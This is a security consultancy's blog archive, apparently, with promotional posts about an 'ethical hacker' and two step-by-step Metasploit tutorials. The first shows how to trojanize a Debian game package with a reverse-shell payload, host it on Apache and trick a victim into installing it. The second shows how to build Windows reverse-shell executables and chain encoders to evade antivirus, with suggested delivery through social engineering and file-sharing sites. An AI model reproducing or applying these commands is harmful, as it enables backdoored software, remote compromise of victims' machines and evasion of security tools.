Showing posts with label trishneet arora hacker. Show all posts
Showing posts with label trishneet arora hacker. Show all posts

Tuesday, 1 October 2013

HackingYantar Trishneet Arora at GNAIMT by TAC

Trishneet Arora - HackingYantar by TAC

Trishneet Arora - HackingYantar by TAC


Trishneet Arora - HackingYantar by TAC




Trishneet Arora - HackingYantar by TAC



Trishneet Arora - HackingYantar by TAC


Trishneet Arora - HackingYantar by TAC


Trishneet Arora with students at GNAIMT HackingYantar by TAC


Trishneet Arora with best student at GNAIMT HackingYantar by TAC

Sunday, 3 March 2013

Trishneet Arora Fake Email Tracing Expert

Trishneet Arora solve fake facebook profiles, fake email tracer, investigate cyber cases by us.

Trishneet Arora Hacked website ethically

Trishneet Arora Hacked Websites Ethically with permission of owner thats called Ethical Hackers.

Penetration Testers hack into computer systems ethically, to find security loopholes.


Saturday, 26 January 2013

Trishneet Arora Ethical Hacker's Company

TAC Security Solution (IT Security Group)
Corporate Office India ( Punjab )
Ground Floor #3761 Bindra Complex,
Model Town, Deep Hospital Road,Ludhiana 141001,
www.tacsecurity.co.in

contact Trishneet Arora

Contact Trishneet Arora ,Ethical Hacker,Hacker,Author

TAC Security Solution (IT Security Group)
Corporate Office India ( Punjab )
Ground Floor #3761 Bindra Complex,
Model Town, Deep Hospital Road,Ludhiana 141001,
www.tacsecurity.co.in

Monday, 2 July 2012

LINUX IS not SECURE virus for linux

WHO SAY LINUX IS SECURE (VIRUS FOR LINUX)

TODAY I WILL SHOW U 100% WORKING VIRUS FOR LINUX.....AND HOW TO CREATE IT FROM BACKTRACK ;;;;

PEOPLE WHO THINK THAT VIRUSES AND TROJANS ARE FOR WINDOWS ONLY HERE I GIVE U THE VIRUS PACKAGE FOR LINUX...

First we need to download the package that i will infect and move it to a temporary working directory. In my example, i will use the package 'freesweep',

1 seeker@bt#apt-get --download-only -install freesweep  

 //this command downloads the freesweep package ///

2 seeker@bt#mkdir /tmp/evil  

//this command is use to create directory evil in temp directory///


3 seeker@bt# mv /var/cache/apt/archives/freesweep_0.90-2_i386.deb /tmp/evil

//this command will move the freesweep package from archives to evil directory//

4 seeker@bt# cd /tmp/evil/


5 seeker@bt:/tmp/evil#dpkg -x freesweep_0.90-2_i386.deb work

 //this command will extract the package to a working directory//


6 seeker@bt:/tmp/evil#mkdir work/DEBIAN

///Now we need to create a DEBIAN directory to hold our additional added features. ///


7 seeker@bt:/tmp/evil/work/DEBIAN#vi control 

//In the 'DEBIAN' directory, create a file named 'control' that contains the following data as shown in snapshot//



8 seeker@bt:/tmp/evil/work/DEBIAN#vi postinst

// this command creates a post-installation script that will execute our binary. In our 'DEBIAN', we'll create a file named 'postinst' that contains the following data as shown in snapshot//





9 seeker@bt#msfpayload linux/x86/shell/reverse_tcp LHOST=192.168.57.78  LPORT=443 X >
/tmp/evil/work/usr/games/freesweep


////this command is used to create a malicious payload that uses a  reverse shell to connect back to us named freesweep////



10 seeker@bt:/tmp/evil/work/DEBIAN#chmod 755 postinst

//in this command we make our script executable//


11 seeker@bt:/tmp/evil/work/DEBIAN#dpkg-deb --build /tmp/evil/work

//this command is used to build our new package work.deb///


12 seeker@bt:/tmp/evil#mv work.deb freesweep.deb

//change that to freesweep.deb //

13 seeker@bt:/tmp/evil#cp freesweep.deb /var /www/

//now we copy our malicious package to www directory to host it on apache///

14 seeker@bt:/tmp/evil#service apache2 start

//this command is used to start the apache service/// 




15 seeker@bt#msfcli exploit/multi/handler PAYLOAD=linux/x86/shell/reverse_tcp  LHOST=192.168.57.78 LPORT=443 E

//now we will  set up the Metasploit multi/handler to receive the incoming connection.//

16 ///in this step we convice our UBUNTU  victim to download the package (game) and install that package .////


victim@ubuntu:~$ wget http://192.168.57.78/freesweep.deb

victim@ubuntu:~$ sudo dpkg -i freesweep.deb
 

//NOW WHEN USER INSTALL OUR GAME WE GET THE COMMAND LINE SESSION//

 
 
 
 

 1000% WORKING

//EDUCATIONAL PURPOSE ONLY :)
Tutorial By Parvesh Janartha | King Metasploit | IT Security Consultant











Friday, 29 June 2012

BYPASS ANTIVIRUS IN METASPLOIT

 HI IM SEEKER

TODAY I WILL EXPLAIN HOW TO CREATE STAND ALONE BINARIES IN METASPLOIT AND HOW TO AVOID DETECTION FROM ANTIVIRUS .

Before we perform an antivirus evasion, let’s look at how to create standalone Metasploit binary payloads with msfpayload. For starters, we’ll create a simple reverse shell that connects back to the attacker and spawns a command shell.
CREATING METASPLOIT BINARIES:-


1 seeker@bt# msfpayload windows/shell_reverse_tcp o  

 /// o options will give you all the options required for the particular payload///


 
 2  seeker@bt#msfpayload windows/shell_reverse_tcp LHOST=192.168.57.78 LPORT=31337 X  > /var/www/file.exe


//this command will create the working executable which you need to install in victim machine using social engineering or binding it with some executable software or uploading it on 4shared.com and forcing him to download the file from 4shared and many more ways///






Now we have a working executable, so we can start a listener with the multi/handler module in msfconsole. multi/handler allows Metasploit to listen for reverse connections.

3 msf>use exploit/multi/handler

4 msf exploit(handler) > set payload windows/meterpreter/reverse_tcp

5 msf exploit(handler) >show options



 6 msf exploit(handler) >set LHOST 192.168.57.78

7 msf exploit(handler) >set LPORT 31337


8 msf exploit(handler) >exploit












///now after running the listener if your victim runs the executable file in his system then you will get the meterpreter shell of your victim.////
///BUT HERE THE MAJOR PROBLEM IS ANTIVIRUS WHICH WILL DETECT YOUR EXECUTABLE AS A VIRUS AND STOP ITS EXECUTION SO NOW WE NEED TO USE ENCODERS TO MAKE OUR EXE TO BE UNDETECTABLE ///
EVADING ANITVIRUS DETECTION :-

Antivirus is always the big issue for the begineers and sometimes for the proffessional hackers but today i will teach u how to evade antivirus using encoders.But first we need to understand how antivirus works.

How Antivirus Works???

Anti-virus software typically uses two different techniques to accomplish this:
  • Examining files to look for known viruses by means of a virus dictionary
  • Identifying suspicious behavior from any computer program which might indicate infection
Most commercial anti-virus software uses both of these approaches, with an emphasis on the virus dictionary approach.

Virus dictionary approach
 
In the virus dictionary approach, when the anti-virus software examines a file, it refers to a dictionary of known viruses that have been identified by the author of the anti-virus software. If a piece of code in the file matches any virus identified in the dictionary, then the anti-virus software can then either delete the file, quarantine it so that the file is inaccessible to other programs and its virus is unable to spread, or attempt to repair the file by removing the virus itself from the file.

To be successful in the medium and long term, the virus dictionary approach requires periodic online downloads of updated virus dictionary entries. As new viruses are identified "in the wild", civically minded and technically inclined users can send their infected files to the authors of anti-virus software, who then include information about the new viruses in their dictionaries.
Suspicious behavior approach
 
The suspicious behavior approach, by contrast, doesn't attempt to identify known viruses, but instead monitors the behavior of all programs. If one program tries to write data to an executable program, for example, this is flagged as suspicious behavior and the user is alerted to this, and asked what to do.

Unlike the dictionary approach, the suspicious behavior approach therefore provides protection against brand-new viruses that do not yet exist in any virus dictionaries.  
///OK NOW WE KNOW HOW ANTIVIRUS WORKS WE WILL NOW ENCODE OUR EXE TO CHANGE ITS SIGNATURE SO THAT WHEN ANTIVIRUS SCANS OUR FILE IT DOES NOT FIND ANY SIGNATURE IN THE DICTIONARY THAT MATCHES OUR FILE AND WE CAN BYPASS THE ANTIVIRUS///

ENCODING THE EXE:-

One of the best ways to avoid being stopped by antivirus software is to encode our payload with msfencode. Msfencode  alters the code in an executable so that it looks different to antivirus software but will still run the same way.Msfencode encodes the original executable in a new binary. Then, when the executable is run, msfencode decodes the original code into memory and executes it.

1 seeker@bt#msfencode -h 

/// see a list of msfencode usage options///

2 seeker@bt#msfencode -l 

 ///For a list of encoder formats///

3 seeker@bt#msfpayload windows/meterpreter/reverse_tcp
LHOST=192.168.1.101 LPORT=31337 R | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/alpha_upper -c 5
-t raw | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/countdown -c 5 -t exe -o /var/www/file.exe







///Here we have used five counts for shikata_ga_nai, feeding the code in raw format into two counts of alpha_upper encoding  , which is then fed to another five counts of shikata_ga_nai ,followed by five counts of countdown encoding , before finally directing the output into the desired executable. We are using a total of 20 encoding loops in an attempt to circumvent the antivirus software.///



 //NOW U CAN CHECK THAT WHETHER YOUR EXECUTABLE IS DETECTED BY ANTIVIRUS OR NOT IF STILL IT IS DETECTED THEN ENCODE IT IN SAME FORMAT BY USING MORE ENCODERS IN RAW FORMAT AND INCREASING COUNT///




Tutorial By Parvesh Janartha | King Metasploit | IT Security Consultant
 

Monday, 18 June 2012

Cyber Crime Investigator Ludhiana

Contact

T.A.C Security Solutions.
Bindra complex,Model Town Extension, Ludhiana , Punjab , India .

We Deals in:

  • Penetration Testing
  • Vulnerability Assessment
  • Website & Network Security
  • Cyber Crime Consulting
  • Cyber Crime Investigating
  • Corporate Training
  • Workshops